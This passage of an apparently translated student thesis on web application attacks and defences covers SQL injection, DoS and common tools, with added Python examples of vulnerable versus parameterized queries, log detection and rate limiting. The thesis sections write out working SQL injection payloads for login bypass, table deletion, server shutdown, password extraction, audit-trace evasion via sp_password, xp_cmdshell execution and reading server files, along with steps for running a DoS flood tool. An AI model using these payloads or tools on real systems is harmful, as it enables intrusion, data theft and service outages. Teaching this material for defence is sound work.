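Example 1 rebuilt against a throwaway database, with its hardened twin beside it. This Python example is added here and is not the thesis's code (the thesis shows ASP/VBScript against SQL Server); it uses an in-memory SQLite database with constructed rows, and the hardening is bound parameters, which the thesis does not show.

```python
import sqlite3

# Added example (not the thesis's code). The same login check is built twice
# against an in-memory SQLite database: once by string concatenation, as in
# Example 1, and once with bound parameters, which is the hardening.
# Sample rows are constructed.


def make_db() -> sqlite3.Connection:
    cn = sqlite3.connect(":memory:")
    cn.execute("CREATE TABLE User (tkUsername TEXT, tkPassword TEXT)")
    # Plain-text passwords only so the demo stays readable; a real table
    # stores salted password hashes, which is a separate control.
    cn.executemany("INSERT INTO User VALUES (?, ?)",
                   [("admin", "s3cret"), ("nhimmap", "hunter2")])
    return cn


def login_vulnerable(cn: sqlite3.Connection, username: str, password: str):
    """Mirrors Example 1: the input is pasted into the SQL text, so a quote
    in the input ends the literal and the rest is parsed as SQL."""
    query = ("SELECT tkUsername FROM User WHERE tkUsername='" + username +
             "' AND tkPassword='" + password + "'")
    row = cn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(cn: sqlite3.Connection, username: str, password: str):
    """Bound parameters: the driver passes the values separately from the
    statement, so quotes and -- in the input are data, never SQL."""
    query = "SELECT tkUsername FROM User WHERE tkUsername=? AND tkPassword=?"
    row = cn.execute(query, (username, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    cn = make_db()
    for u, p in [("' OR ''='", "' OR ''='"), ("admin'--", "x"), ("nhimmap", "hunter2")]:
        print(f"{u!r:14} vulnerable -> {login_vulnerable(cn, u, p)!r:10}"
              f" safe -> {login_safe(cn, u, p)!r}")
```

The stacked-statement form of Example 2 ("; drop table User--") cannot be reproduced with this driver because sqlite3's execute() refuses more than one statement per call, which is itself a useful property to look for in a database API. The tautology and comment forms behave exactly as the thesis describes: the concatenated query logs in as the first row, the parameterized one returns no row.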
Combined with SQL's special characters:
    the character ; marks the end of a query
    the characters -- hide everything that follows them on the same line
Example 2:
    Username: '; drop table User--
    Password:
The SQL statement then becomes:
    SELECT tkUsername FROM User WHERE tkUsername='';drop table User--' AND Password='" & tkPassword & "'
With this statement the User table is deleted entirely.
Example 3: Another example that uses SQL special characters to enter the system:
    Username: admin'--
    Password:
The SQL statement becomes:
    SELECT tkUsername FROM User WHERE tkUsername='admin'--' AND Password='" & tkPassword & "'
This statement logs into the system as admin without requiring a password.
2.2 Attacks based on the SELECT statement
Beyond the simple technique above, attacks usually rely on error messages to obtain information about tables and their columns. Doing so requires understanding the error messages and adjusting the input accordingly.
Direct injection: arguments inserted into the statement that are not enclosed in single or double quotes are the direct-injection case. To neutralise the quotes and change the statement while keeping the syntax valid, the injected string must begin with a single quote before the inserted characters, and the end of the statement must contain a single quote, for example:
    StrSQL = "SELECT tkUsername FROM User WHERE tkUsername='' and ''='"
If, when doing this, the error message mentions the character ( then the injected string must contain a ):
Example 4: Suppose:
    StrSQL = "SELECT tkUsername FROM User WHERE (tkUsername='" & tName & "')"
Then a syntactically valid injection is:
    StrSQL = "SELECT tkUsername FROM User WHERE (tkUsername='') or ''='"
The % character is also commonly used where information is searched for.
Example 5:
    StrSQL = "SELECT tkUsername FROM User WHERE tkUsername like '%" & tName & "'"
2.3 Attacks based on the HAVING clause
HAVING, used together with the GROUP BY clause, is an effective way to obtain table and column information; it is discussed in more depth in part 4.
2.4 Attacks based on the UNION operator
The SELECT statement retrieves information from the database. Normally the place where something can be inserted into a SELECT statement is after WHERE. To return more rows from the table, the WHERE condition is changed by appending UNION SELECT.
Example 6:
    StrSQL = "SELECT tkUsername FROM User WHERE tkUsername like '%" & tName & "' UNION SELECT tkPassword from User"
This statement returns a result set that combines tkUsername with tkPassword from the User table.
Note:
The number of columns in the two SELECTs must match. That is, the original SELECT and the appended UNION SELECT must have the same number of columns, of the same types. The syntax error returned after the UNION is appended reveals the type of each column. Below are examples carried out without knowing the database contents, using HAVING, GROUP BY and UNION:
Example 7: Recall the query used for login:
    SQLQuery = "SELECT tkUsername,tkPassword FROM User WHERE tkUsername='" & strUsername & "' AND Password='" & tkPassword & "'"
First, to learn the table and column names the query uses, use a HAVING clause as in the following example. Input value:
    Username: ' having 1=1--
Error produced:
    [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'User.tkUsername' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
This error reveals that the table used by the query is User and that it has a column named tkUsername.
Next use GROUP BY:
Example 8:
    Username: ' group by User.tkUsername having 1=1--
Error produced:
    [Microsoft][ODBC SQL Server Driver][SQL Server] Column 'User.tkPassword' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
So tkPassword is a column of the User table and is used in the query.
Keep using GROUP BY until all columns of the User table that take part in the query are known.
When no more GROUP BY syntax errors appear, move on to determining the type of each column. UNION is used for this:
Example 9:
    Username: ' union select sum(tkUsername) from User--
sum computes the total of the argument inside the parentheses; the argument must be numeric. If it is not, the following error is raised:
    [Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.
With this error message, tkUsername is certainly of type varchar.
With this method the type of every column in the table can be determined easily. Once the hacker has the full picture, adding information to the User table is easy.
Example 10:
    Username: '; insert into User(tkUsername,tkPassword) values('admin', '')--
Having added content as in Example 6.III.4.2.4, the hacker now becomes the administrator without needing an authentication password.
Example 11: illustrates a procedure that lets the hacker read all the information in the User table:
Step 1: Create a stored procedure that copies all information from the two columns tkUsername and tkPassword of the User table into one string in a new table foo with a single column ret, using this code:
    create proc test as
    begin
        declare @ret varchar(8000)
        set @ret=':'
        select @ret=@ret+' '+tkUsername+'/'+tkPassword from User
        select @ret as ret into foo
    end
The statement is executed by entering it in the form:
    Username: '; Create proc test as begin declare @ret varchar(8000) set @ret=':' select @ret=@ret+' '+tkUsername+'/'+tkPassword from User select @ret as ret into foo
Step 2: Call the stored procedure
After the stored procedure has been created as above, invoke it:
    Username: ';exec test
Step 3: Use UNION to view the contents of table foo
    Username: '; select ret,1 from foo union select 1,1 from foo
Error produced:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ':
    admin/passofAdmin nhimmap/passofnhimmap minhthu/passofminhthu' to a column of data type int.
Through these steps the hacker obtains the contents of the User table: the names (tkUsername) and the passwords (tkPassword).
Step 4: The hacker can also carefully delete table foo to remove traces:
    Username: '; drop table foo--
Example 12: Here is another way to determine the contents of the User table, a search method that proceeds as follows:
Step 1: Walk the User table row by row
    Username: ' union select 1,1
or:
    Username: ' union select min(tkUsername),1 from User where tkUsername > 'a'--
Error produced:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value 'admin' to a column of data type int.
The first user in the User table is admin.
Step 2: To learn the next values, enter the following string:
    Username: ';select min(tkUsername),1 from User where tkUsername > 'admin' union select 1,1 from User
Error produced:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax Error Converting the varchar value 'nhimmap' to a column of data type int.
Step 3: Repeat step 2 to obtain, row by row, the values of the tkUsername column of the User table.
Step 4: To learn tkPassword as well, proceed as follows:
    Username: ';select tkPassword,1 from User where tkUsername='admin' union select 1,1 from User
Error produced:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error Converting the varchar value 'passOfAdmin' to a column of data type int.
To learn about the tables and columns in the database, the system table INFORMATION_SCHEMA.TABLES can be queried.
Example 13:
    select TABLE_NAME from INFORMATION_SCHEMA.TABLES
INFORMATION_SCHEMA.TABLES holds information about every table on the server. The TABLE_NAME column holds the name of each table in the database.
    SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='User'
This statement is used to learn the columns of a table. UNION can also be used to learn SQL Server's environment variables.
Example 14: To find out which server the application is running on:
    Username: ';select @@SERVERNAME union select 1
Error produced:
    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
    error converting the varchar value 'KHOAI_NGU' to a column of data type int.
2.5 Attacks based on the INSERT statement
The INSERT keyword puts information into the database. INSERT is typically used for things such as user registration information, guestbooks, and so on.
The ; and -- techniques are used just as with the SELECT statement; the number and types of the inserted values must be correct to avoid syntax errors (if the data types cannot be determined, numbers can be entered for everything).
Example 15:
    SQLString = "INSERT INTO User VALUES ('" & strUsername & "', '" & strName & "', '" & strPassWord & "', '" & strLimitSize & "')"
2.6 Attacks based on STORED PROCEDURES
Stored procedures are used in web programming to reduce the complexity of the application and to avoid SQL injection attacks. Nevertheless, the hacker can still abuse stored procedures to attack the system.
Example 16: the stored procedure sp_login takes two parameters, username and password. If the input is:
    Username: nhimmap
    Password: ';shutdown--
the call to the stored procedure becomes:
    exec sp_login 'nhimmap','';shutdown--'
The shutdown command stops SQL Server immediately.
2.7 Some additional attack techniques
2.7.1 Strings without single quotes
Programmers can protect their applications by removing all quotes; usually this is done by replacing each quote with two quotes.
Example 17:
    Function escape(input)
        input = replace(input, "'", "''")
        escape = input
    end function
Clearly this prevents all of the attacks above. However, to produce a string value without using quotes, the char() function can be used as in the following example:
Example 18:
    INSERT into User VALUES(666, char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), char(0x63)+char(0x68)+char(0x72)+char(0x69)+char(0x73), 0xffff)
Example 19 above contains no single quote, yet it still inserts a string into the table; it is equivalent to:
    INSERT into User VALUES(666,'chris','chris',255)
The hacker can also choose a numeric username and password to avoid quotes, as in the following example:
Example 20:
    INSERT into User VALUES(667,123,123,0xffff)
SQL Server automatically converts the numbers to strings.
2.7.2 Second-order attacks
Even though the application replaces single quotes, SQL code can still be injected.
Example 21: Register an account in the application with the following username:
    Username: admin'--
    Password: passofadmin
The application replaces the quote, and the resulting insert is:
    INSERT into User VALUES(123, 'admin''--', 'password', 0xffff)
(but the database stores it as admin'--)
Suppose the application lets users change their password. The ASP code is designed to ensure the user enters the old password correctly before entering a new one. The code is as follows:
    username = escape( Request.form("username") );
    oldpassword = escape( Request.form("oldpassword") );
    newpassword = escape( Request.form("newpassword") );
    var rso = Server.CreateObject("ADODB.Recordset");
    var sql = "select * from users where username = '" + username + "' and password = '" + oldpassword + "'";
    rso.open( sql, cn );
    if (rso.EOF)
    {
The query that sets the new password is:
    sql = "update users set password = '" + newpassword + "' where username = '" + rso("username") + "'"
rso("username") is the username value obtained from the login query, and it is admin'--
The query now becomes:
    update users set password = 'password' where username = 'admin'--'
So the hacker can change the admin password to a value of their choosing. This case still exists in most large applications today that use an escaping mechanism. The best solution is to reject bad values rather than to repair them. The problem is that some input fields (such as a name field) must allow these characters.
For example: O'Brien. The best way to address this is to disallow single quotes. If that is not possible, strip and replace them as above. In that case the best approach is to make sure that all data entering an SQL query (including values already in the database) is strictly controlled.
Some applications prevent users from injecting queries by limiting the length of the input field. With this limit some attacks become impossible, but there is still a gap the hacker can exploit.
Example 22: Suppose both username and password are limited to at most 16 characters. Input:
    Username: aaaaaaaaaaaaaaa'
    Password: '; shutdown--
The application replaces the single quote with two single quotes, but because the string length is capped at 16 characters, the quote that was just added is cut off. The SQL statement becomes:
    select * from users where username='aaaaaaaaaaaaaaa'' and password='''; shutdown--'
and the username in the statement has the value:
    aaaaaaaaaaaaaaa' and password='
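Example 22 replayed in Python, as an added example that is not the thesis's code. One builder escapes and then truncates to the 16-character column width, as the vulnerable application does; the other checks the raw length first and rejects over-long input instead of truncating. A small tokenizer reads the resulting SQL the way SQL Server does (a doubled '' inside a literal is an escaped quote) so the two outcomes can be compared. The column width and the inputs are the thesis's; the function names are constructed.

```python
# Added example (not the thesis's code): the escape-then-truncate defect of
# Example 22 beside a builder that validates length before escaping.
# split_literals() is a deliberately small tokenizer for '...' literals with
# '' as the escape, enough to show what the server would parse.

MAX_LEN = 16


def escape_quotes(value: str) -> str:
    return value.replace("'", "''")


def build_query_escape_then_truncate(username: str, password: str) -> str:
    """Vulnerable order of operations: the doubled quote can be cut in half."""
    u = escape_quotes(username)[:MAX_LEN]
    p = escape_quotes(password)[:MAX_LEN]
    return f"select * from users where username='{u}' and password='{p}'"


def build_query_validate_first(username: str, password: str) -> str:
    """Length check on the raw value, then escape; nothing is ever truncated.
    (Bound parameters remain the preferred fix; this keeps the section's
    escaping approach but applies it in a safe order.)"""
    for value in (username, password):
        if len(value) > MAX_LEN:
            raise ValueError("input exceeds column width")
    return (f"select * from users where username='{escape_quotes(username)}'"
            f" and password='{escape_quotes(password)}'")


def split_literals(query: str):
    """Return (sql_outside_literals, [literal values]) for a T-SQL style string."""
    outside, literals = [], []
    i, n = 0, len(query)
    while i < n:
        if query[i] != "'":
            outside.append(query[i])
            i += 1
            continue
        i += 1                                   # opening quote
        lit = []
        while i < n:
            if query[i] == "'":
                if i + 1 < n and query[i + 1] == "'":
                    lit.append("'")              # '' inside a literal
                    i += 2
                    continue
                break                            # closing quote
            lit.append(query[i])
            i += 1
        literals.append("".join(lit))
        i += 1                                   # skip closing quote
    return "".join(outside), literals


def statement_is_intact(query: str, username: str, password: str) -> bool:
    """True when the parsed literals are exactly the submitted values and
    no SQL keyword leaked outside them."""
    outside, literals = split_literals(query)
    return literals == [username, password] and "shutdown" not in outside.lower()


def over_long_is_rejected(length: int = MAX_LEN + 1) -> bool:
    try:
        build_query_validate_first("a" * length, "x")
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    u, p = "aaaaaaaaaaaaaaa'", "'; shutdown--"
    for name, q in [("escape-then-truncate", build_query_escape_then_truncate(u, p)),
                    ("validate-first", build_query_validate_first(u, p))]:
        outside, lits = split_literals(q)
        print(f"{name}: intact={statement_is_intact(q, u, p)} literals={lits}")
        print("   outside literals:", outside)
```

Run on the thesis's inputs, the vulnerable builder yields a first literal of "aaaaaaaaaaaaaaa' and password='" and leaves "; shutdown--" outside any literal, exactly the outcome the section describes; the validate-first builder yields the two literals the user typed and nothing else.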
2.7.3 Evading auditing:
SQL Server has a strict auditing facility, the sp_trace* family of procedures, which can record many events in the database, in particular T-SQL events, logging every SQL statement executed on the server. If auditing is turned on, all of the hacker's SQL queries are recorded too, so an administrator can see what is happening and quickly find a remedy.
There is, however, a way to defeat this: by adding the string sp_password to the T-SQL statement, because when the audit encounters that string it records the following instead:
    -- 'sp_password' was found in the text of this event.
    -- The text has been replaced with this comment for security reasons.
even when sp_password appears inside a comment. So, to hide every attack query, it is enough to append sp_password after the -- like this:
    Username: admin'--sp_password
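Because sp_password in the statement text makes the database's own trace blank out the statement, the administrator's fallback is to look at requests where the input is still visible: the web tier. The following Python example is added here and is not the thesis's code; it runs a few signature checks for the techniques of section 2 over constructed web-server log lines (the addresses, paths and timestamps are sample values), decoding the request target first so that percent-encoding does not hide the payload.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Added example (not the thesis's code): request-level detection for the
# SQL injection techniques of section 2, run over constructed log lines.
# Addresses, paths and timestamps below are sample values.

SAMPLE_LOG = """\
10.0.0.5 - - [08/Mar/2019:10:01:02 +0700] "GET /process_login.asp?username=admin%27--sp_password HTTP/1.1" 200 512
10.0.0.6 - - [08/Mar/2019:10:01:05 +0700] "GET /search.asp?q=%27+union+select+sum%28tkUsername%29+from+User-- HTTP/1.1" 500 301
10.0.0.7 - - [08/Mar/2019:10:01:09 +0700] "GET /index.asp HTTP/1.1" 200 2048
10.0.0.8 - - [08/Mar/2019:10:01:12 +0700] "GET /search.asp?q=O%27Brien HTTP/1.1" 200 1100
"""

# Common-log-format request line: client, timestamp, method, target, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3})')

# Each pattern is tied to a technique named in section 2 of the thesis.
PATTERNS = [
    ("comment_after_quote", re.compile(r"'\s*--")),                          # admin'--
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b", re.I)),  # 2.4
    ("stacked_statement", re.compile(r";\s*(?:drop|insert|exec|shutdown|create|select)\b", re.I)),
    ("trace_evasion", re.compile(r"sp_password", re.I)),                      # 2.7.3
    ("extended_proc", re.compile(r"\bxp_\w+", re.I)),                         # 2.7.4
]


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one finding per request whose decoded target matches a pattern."""
    findings: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, ts, method, target, status = m.groups()
        decoded = unquote_plus(target)   # inspect what the application will see
        hits = [name for name, rx in PATTERNS if rx.search(decoded)]
        if hits:
            findings.append({"client": client, "time": ts, "method": method,
                             "status": int(status), "target": decoded, "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']:10} {f['status']} {f['hits']}  {f['target']}")
```

Two limits worth knowing: a web-server access log carries only the query string, so form fields sent by POST (the thesis's login form) need application-level logging of the submitted values to be covered, and a bare quote is not flagged on its own, so the O'Brien request passes while the admin'-- request does not.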
2.7.4 Using the extended stored procedures built into SQL Server
If SQL Server is installed with default settings, it runs under the SYSTEM account, which is equivalent to full Windows access. master..xp_cmdshell can then be used to run commands remotely:
    '; exec master..xp_cmdshell 'ping 10.10.1.2'--
Try double quotes (") if single quotes (') do not work.
Below are some extended stored procedures hackers commonly use to run commands that reveal information on the victim machine:
    xp_availablemedia: shows the drives present on the machine
    xp_dirtree: shows all directories, including subdirectories
    xp_loginconfig: retrieves information about the server's security mode
    xp_makecab: lets the user create archive files on the server (or any file the server can access ...
2.7.5 Using custom extended stored procedures
The extended stored procedure API is a program with the simple job of producing an extended stored procedure DLL that contains the hostile code. The DLL can be uploaded to the server with commands or with other automated transfer techniques such as an HTTP download or an FTP script.
Once the DLL file is on the server, the hacker can create an extended stored procedure with the following command:
Example 19:
    sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
It can then be executed like an ordinary extended stored procedure:
    exec xp_webserver
When finished, it can be removed with:
    sp_dropextendedproc 'xp_webserver'
xp_ntsec_enumdomains lists the domains the server can query.
xp_terminate_process terminates a process given its PID as the parameter.
2.7.6 Importing a text file into a table
With the bulk insert command, data from a text file can be loaded into a temporary table.
Example 24: create a simple table as follows:
    create table foo (line varchar(8000))
Then run bulk insert to copy the file's data into the table.
Example 25:
    bulk insert foo from 'c:\inetpub\wwwroot\process_login.asp'
The contents of process_login.asp can then be retrieved with the techniques of Example 18.
2.7.7 COUNTERMEASURES
In most browsers, characters should be encoded in the URL before being used.
SQL injection attacks rely on error messages, so the best defence remains not showing error messages to the user,
replacing them with a page designed by the developer that is shown whenever an error occurs in the application.
Check user input carefully, replacing characters such as ' and ; and so on.
Strip the meta-characters ' " / \ ; and the extended characters NULL, CR, LF, ... from strings received from:
- data submitted by the user
- URL parameters
- cookie values
For numeric values, convert them to integer before running the SQL query, or use ISNUMERIC to make sure the value is an integer.
Use an algorithm to encrypt the data.
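Two of the countermeasures above are easy to get subtly wrong: converting a numeric parameter before it reaches SQL, and hiding database errors from the user without losing them for the administrator. The following Python example is added here and is not the thesis's code; it uses an in-memory SQLite table with constructed rows, and the function names and messages are constructed.

```python
import logging
import sqlite3
from typing import Tuple

# Added example (not the thesis's code): numeric parameters are parsed
# strictly (and bounded) before they reach SQL, the query itself is
# parameterized, and database errors go to the server log while the client
# only ever sees a developer-designed generic page. Table and rows are
# constructed for the demo.

log = logging.getLogger("webapp")

GENERIC_ERROR = "An error occurred while processing your request."
INVALID_INPUT = "Invalid request."


def make_users_db(with_table: bool = True) -> sqlite3.Connection:
    cn = sqlite3.connect(":memory:")
    if with_table:
        cn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT)")
        cn.executemany("INSERT INTO users VALUES (?, ?)", [(1, "alice"), (2, "bob")])
    return cn


def parse_int_param(raw: str, lo: int = 1, hi: int = 2**31 - 1) -> int:
    """Strict integer parsing: ASCII digits only, then a range check.
    str.isdigit() on ASCII rejects signs, spaces and '1 OR 1=1' alike."""
    if not raw.isascii() or not raw.isdigit():
        raise ValueError("not a positive integer")
    value = int(raw)
    if not lo <= value <= hi:
        raise ValueError("out of range")
    return value


def fetch_user(cn: sqlite3.Connection, raw_id: str) -> Tuple[int, str]:
    """Return (HTTP status, body). The body never contains driver text."""
    try:
        uid = parse_int_param(raw_id)
    except ValueError:
        return 400, INVALID_INPUT
    try:
        row = cn.execute("SELECT id, name FROM users WHERE id = ?", (uid,)).fetchone()
    except sqlite3.Error as exc:
        # Full detail goes to the server log for the administrator ...
        log.error("database error for id=%s: %s", uid, exc)
        # ... and the client gets the generic page, never the driver message.
        return 500, GENERIC_ERROR
    if row is None:
        return 404, "Not found."
    return 200, f"User {row[1]}"


if __name__ == "__main__":
    logging.basicConfig(level=logging.ERROR)
    db = make_users_db()
    for raw in ["1", "99", "1 OR 1=1", "-1"]:
        print(f"id={raw!r:12} -> {fetch_user(db, raw)}")
    print("broken schema ->", fetch_user(make_users_db(with_table=False), "1"))
```

The error-message examples in 2.2 to 2.4 all depend on the driver text ("Syntax error converting the varchar value ...") reaching the browser; with this pattern the same failures still happen and are still logged, but the response carries nothing the hacker can learn from.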
3 Buffer overflow and denial of service attack techniques (Buffer overflow)
This technique mainly exploits a user submitting more code than the memory the application initially allocated, driving the system into a buffer overflow and possibly allowing an arbitrary piece of code to be injected. If the application is configured to run as root, the attacker can act as the administrator of the web server.
This is regarded as a classic attack. In this thesis I present one technique that causes buffer overflow and denial of service, namely DoS.
3.1 Concept
A DoS attack is an attack that paralyses network services so that they can no longer answer requests. It affects many systems, is very easy to carry out, and is very hard to defend against. DoS attacks usually build on protocols. For example, with
the ICMP protocol, the hacker can use an e-mail bomb to send thousands of e-mail messages, consuming bandwidth to exhaust system resources on the mail server. Or software can be used to send a flood of requests to the server so that it cannot answer other legitimate requests.
3.2 Targets affected by this kind of attack
ATTACKS ON SWAP SPACE: Most systems have a few hundred MB of swap space to serve requests from clients. Swap space is typically used for short-lived child processes, so a DoS can be based on filling the swap space completely.
ATTACKS ON BANDWIDTH: The bandwidth available to each system is limited, so if the hacker sends many requests to the system at once, the bandwidth cannot carry that large volume of data and the system collapses.
ATTACKS ON RAM: A DoS that occupies a large share of RAM can also cause problems that destroy the system. The Buffer Overflow attack is one example of this kind of damage.
ATTACKS ON DISKS: A classic attack is filling the hard disk. The disk can become full and unusable.
3.3 Kinds of DDoS attacks
3.3.1 The first kind
The hacker is fully able to flood the system because the hacker's bandwidth exceeds the server's. This kind of attack is not limited by network transfer speed. For example: a hacker with a high-speed T1 line (1.544 Mbps) or better can easily take down a system on a 56 Kbps line.
3.3.2 The second kind
This kind is used when the hacker's network link is much slower than the server's. Unlike the traditional DoS attack (part 2), this larger bandwidth attack uses packets from many different systems arriving at the target at the same time, so that the target's link can no longer cope and the server can no longer accept any packet at all. This attack takes the server off the Internet.
This is a denial-of-service method, but it is called DDoS (distributed denial of service) rather than DoS: many machines are triggered at once to send packets to the server, so that the server can no longer receive packets and is cut off from the Internet.
By spoofing the server's IP address, the hacker sends many packets at once
to powerful systems on the network. When these systems receive the spoofed SYN packets, they accept the connection and reply with a SYN/ACK packet. Because the hacker has changed the source IP of the SYN packets to the server's address, those SYN/ACK packets are sent to the server. Receiving so many packets at once, the server's link cannot cope, the server refuses every packet, and at that point the server collapses.
3.3.3 Attacks on system resources
This kind of attack targets system resources rather than network resources: CPU, memory, the file system, processes, and so on. The hacker is a legitimate user of the system with a limited allotment of resources. However, the hacker abuses that access to request more resources, so the system or other legitimate users are denied the shared resources.
The attack renders the system unusable because its resources are exhausted and no process can run any more.
3.4 Countermeasures
Although a denial-of-service attack only takes the system down for a few minutes, the consequences are considerable (financial loss and loss of reputation). It is a technique hackers often use when they cannot take administrative control of the system or its information, or when they want to damage an organisation's reputation. Address spoofing also makes it easier for the hacker to attack without fear of detection.
Denial of service is the kind of attack that causes the most difficulty both in defending and in investigating to find the culprit, because most hackers change their machine's IP address, so it is very hard to identify who is responsible.
To prevent amplification of traffic:
- Disable broadcast at the border router
- Increase the size of the connection queue
Queue overflow across many connections can be prevented, although this uses more resources:
- Reduce the connection setup time
- Use software that detects and stops DoS attacks:
Most operating systems today support detecting and preventing SYN flood attacks. There is also software able to avoid this kind of attack. For example, Linux kernels 2.0.30 and later provide an option called SYN Cookie: the kernel tracks and records possible SYN attack activity, then uses a cryptographic protocol such as SYN cookies so that legitimate users can continue to connect to the system. Windows NT 4.0 and later use a
backlog technique: whenever the connection queue cannot keep up, the system automatically allocates more resources to the queue, so the queue is not overwhelmed.
The application should allow each client machine only a prescribed maximum number of connections, to prevent the hacker from sending many requests at once and causing congestion.
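The per-client limit recommended at the end of 3.4, as an added Python example that is not the thesis's code. It keeps a sliding window of request timestamps per client address and refuses requests over the quota rather than queueing them; the limits, the addresses and the request trace are constructed values.

```python
from collections import defaultdict, deque
from typing import Deque, Dict, List, Tuple

# Added example (not the thesis's code): the per-client limit from the end
# of section 3.4 as a sliding-window counter keyed by client address.
# Limits, addresses and the request trace are constructed values.


class PerClientLimiter:
    def __init__(self, max_requests: int = 20, window_seconds: float = 10.0) -> None:
        self.max_requests = max_requests
        self.window = window_seconds
        self._hits: Dict[str, Deque[float]] = defaultdict(deque)

    def allow(self, client: str, now: float) -> bool:
        """True if the client may proceed; amortised O(1) per call."""
        q = self._hits[client]
        while q and now - q[0] >= self.window:     # drop timestamps outside the window
            q.popleft()
        if len(q) >= self.max_requests:
            return False                              # over quota: refuse, do not queue
        q.append(now)
        return True


def replay(events: List[Tuple[float, str]], limiter: PerClientLimiter) -> Dict[str, Tuple[int, int]]:
    """Feed (timestamp, client) pairs through the limiter in time order and
    return {client: (accepted, rejected)}."""
    counts: Dict[str, List[int]] = defaultdict(lambda: [0, 0])
    for t, client in sorted(events):
        counts[client][0 if limiter.allow(client, t) else 1] += 1
    return {c: (a, r) for c, (a, r) in counts.items()}


def constructed_trace() -> List[Tuple[float, str]]:
    """One flooding client sending 100 requests in 5 s, and one normal client
    sending 5 requests spread over 8 s (constructed data)."""
    flood = [(i * 0.05, "10.0.0.9") for i in range(100)]
    normal = [(i * 2.0, "10.0.0.3") for i in range(5)]
    return flood + normal


if __name__ == "__main__":
    for client, (ok, dropped) in replay(constructed_trace(), PerClientLimiter()).items():
        print(f"{client}: accepted={ok} rejected={dropped}")
```

This protects against the single-source flood of 3.3.1 and the resource-exhaustion case of 3.3.3; against the distributed attack of 3.3.2, where each source stays under the quota, the limit must be combined with the network-level measures listed above (SYN cookies, backlog sizing, upstream filtering).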
CHAPTER 3 INTRODUCTION TO SOME COMMON TOOLS USED IN WEB APPLICATION ATTACK AND SECURITY TECHNIQUES
3.1. Scanning tools
In web application attack and security work, the first step is usually to check the system for flaws in order to identify its vulnerabilities. Vulnerability scanning tools (tool scanning) help greatly with this; hackers can use them to find flaws and then use a framework or ready-made code from documents or the Internet to attack the web application. But they are also useful tools for network administrators and web application administrators, who can use them to assess the security level of their web application system and from that choose suitable security measures or patch the flaws.
In this thesis I introduce a very widely used open-source scanning tool, nmap. Nmap is very easy to use: it can be driven from the command line in a DOS environment or through the options on nmap's own graphical interface.
Figure 1: the nmap interface
Its user-friendly interface makes nmap very easy to use. Below is an example of scanning a web application. The host is forum.congthuongit.net. Fill in Target: forum.congthuongit.net, profile: Intense scan. The results obtained are shown below.
Figure 2: description of nmap's intense scan
Figure 3: results from nmap (nmap output)
Figure 4: results in nmap output (continued)
This is the view of the protocols of the web application system.
Figure 5: the host being examined
Despite its many functions, there are times when nmap cannot determine the target's parameters exactly. In the case above, nmap could not determine the host's software information (no OS matches for host). When you use nmap to scan a host, the web site may be temporarily inaccessible afterwards; do not worry, you will be able to reach it again a few minutes later.
2. Packet capture tools
Using a packet capture tool is a common way to eavesdrop on packets on the network. In this thesis I introduce the Wireshark tool, an open-source tool with a friendly and easy-to-use graphical interface.
Figure 6: the Wireshark interface
Click Interface List, choose the network card, and choose Start.
The following screen appears (Figure 7).
The yellow part shows the packets being transmitted to you. The part below shows the packet contents encoded in hexadecimal.
Figure 7: the Wireshark interface while capturing packets
When you click on the hex pane or on one of the information rows, you obtain the packet's encoded information, as in the figure below.
Figure 8: information about the packets captured by Wireshark
You can save this information and use it later. Your next job is to find additional software to decode these captures and read the packet information.
3. Tools for DoS attacks on web applications
As presented in chapter 2, DoS is a classic method that is hard to prevent. Here I introduce DoSHTTP 2.5, a very common tool for DoS attacks on web applications and one hackers often use. The DoSHTTP 2.5 interface is shown in Figure 9.
Figure 9: the DoSHTTP 2.5 interface
Operating this tool is very easy: the hacker only needs to enter the target URL, the address to be attacked, choose the number of sockets, and press start flood, then wait; about 5 minutes later the host is no longer reachable. Warning: attacking a web application is against the law, so you must not use this tool carelessly.
CONCLUSION AND FUTURE DIRECTIONS OF THE THESIS
Web applications are developing at a dizzying pace, and as a result web application attack and security techniques are developing to a high level as well. Web application attack and security is a very broad subject that demands deep understanding and high technical expertise. Because the time for this thesis was short and my skills are still limited, what I present in this thesis is only basic knowledge and has many shortcomings. But with the dedicated help of the lecturers of the Faculty of Information Technology, above all Mr. Huỳnh Nguyễn Thành Luân, and through doing this thesis myself, I now understand more clearly the technical concepts related to web applications that I had not yet grasped firmly. I also understand more clearly the basic application attack techniques that underpin modern attack methods, and I have learned some methods of preventing attacks and securing web applications.
This knowledge will help me a great deal in the future, giving me a firmer technical foundation in web application security. After completing this thesis I will use what I have learned and try to study further and learn more of the related technical knowledge in order to build a tool or a method for securing web applications effectively against attacks.